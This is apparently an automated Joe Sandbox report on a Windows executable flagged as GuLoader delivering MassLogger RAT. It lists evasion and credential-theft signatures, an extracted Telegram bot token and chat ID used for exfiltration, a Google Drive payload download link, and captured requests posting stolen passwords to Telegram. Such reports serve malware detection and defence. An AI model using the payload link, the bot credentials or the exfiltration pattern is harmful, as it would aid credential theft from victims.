Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WGi85dsMNp.exe

Overview

General Information

Sample name:WGi85dsMNp.exe
renamed because original name is a hash value
Original sample name:5fd6c5f71c6fdda582775fa5822b5ed0af1e5dc9431c06d453752a6bcbbe359a.exe
Analysis ID:1588318
MD5:2275024102505f0997f027c71970750d
SHA1:10a4feb8f216f86caa840ff85ba02c85e00e8665
SHA256:5fd6c5f71c6fdda582775fa5822b5ed0af1e5dc9431c06d453752a6bcbbe359a
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • WGi85dsMNp.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\WGi85dsMNp.exe" MD5: 2275024102505F0997F027C71970750D)
    • WGi85dsMNp.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\WGi85dsMNp.exe" MD5: 2275024102505F0997F027C71970750D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2180305657.0000000003349000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: WGi85dsMNp.exe PID: 1476JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:04:28.155649+010020577441Malware Command and Control Activity Detected192.168.2.549784149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:04:20.641993+010028032742Potentially Bad Traffic192.168.2.549738193.122.130.080TCP
            2025-01-11T00:04:27.173384+010028032742Potentially Bad Traffic192.168.2.549738193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:04:15.689028+010028032702Potentially Bad Traffic192.168.2.549705142.250.186.78443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:04:27.847490+010018100081Potentially Bad Traffic192.168.2.549784149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: WGi85dsMNp.exeAvira: detected
            Source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: WGi85dsMNp.exe.1476.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: WGi85dsMNp.exeVirustotal: Detection: 76%Perma Link
            Source: WGi85dsMNp.exeReversingLabs: Detection: 60%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BD1EC CryptUnprotectData,2_2_354BD1EC
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BD9D9 CryptUnprotectData,2_2_354BD9D9
            Source: WGi85dsMNp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49749 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49784 version: TLS 1.2
            Source: WGi85dsMNp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00402868 FindFirstFileW,2_2_00402868
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_0040672B FindFirstFileW,FindClose,2_2_0040672B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405AFA
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354B1042h2_2_354B0C28
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BC985h2_2_354BC638
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354B0671h2_2_354B03C4
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BC041h2_2_354BBD88
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BB791h2_2_354BB4EC
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354B1042h2_2_354B0F6F
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BEA48h2_2_354BE790
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BE198h2_2_354BDEF3
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BBBE9h2_2_354BB944
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BC499h2_2_354BC1F2
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BF2F8h2_2_354BF053
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BB339h2_2_354BB07F
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BE5F0h2_2_354BE34B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BEEA0h2_2_354BEBF7
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 354BDD40h2_2_354BDA9B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then push 00000000h2_2_35A9BDF0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A916A8h2_2_35A91400
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A9882Dh2_2_35A98650
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A991B7h2_2_35A98650
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A95058h2_2_35A94DB0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A92808h2_2_35A92560
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A91F58h2_2_35A91CB0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A97770h2_2_35A974C8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A96EC0h2_2_35A96C18
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A91250h2_2_35A90FA8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A96A68h2_2_35A967C0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A961B8h2_2_35A95F10
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A94218h2_2_35A93F70
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A93968h2_2_35A936C0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A930B8h2_2_35A92E10
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A95908h2_2_35A95660
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A92C60h2_2_35A929B8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_35A98193
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then push 00000000h2_2_35A9C92F
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A923B0h2_2_35A92108
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A94ACAh2_2_35A94820
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A97318h2_2_35A97070
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A91B00h2_2_35A91858
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_35A9CBE7
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A94670h2_2_35A943C8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A93DC0h2_2_35A93B18
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A96610h2_2_35A96368
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_35A97B63
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_35A98373
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A95D60h2_2_35A95AB8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A954B0h2_2_35A95208
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 4x nop then jmp 35A93510h2_2_35A93268

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49784 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49784 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a138391b77Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49705 -> 142.250.186.78:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49749 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a138391b77Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D34000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: WGi85dsMNp.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002698000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: WGi85dsMNp.exe, 00000002.00000002.3921978113.0000000004250000.00000004.00001000.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz
            Source: WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz5
            Source: WGi85dsMNp.exe, 00000002.00000003.2263229811.0000000002707000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.000000000271F000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: WGi85dsMNp.exe, 00000002.00000003.2263229811.0000000002707000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download
            Source: WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download#h
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49784 version: TLS 1.2
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004034A5
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_6F941B5F0_2_6F941B5F
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00404DCC2_2_00404DCC
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00406AF22_2_00406AF2
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_001643282_2_00164328
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00168DA02_2_00168DA0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00165F902_2_00165F90
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00162DD12_2_00162DD1
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354B55602_2_354B5560
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BCCA02_2_354BCCA0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BF64B2_2_354BF64B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354B76282_2_354B7628
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354B332B2_2_354B332B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354B03C42_2_354B03C4
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BBD882_2_354BBD88
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BB4EC2_2_354BB4EC
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BCC912_2_354BCC91
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BE7902_2_354BE790
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BC64B2_2_354BC64B
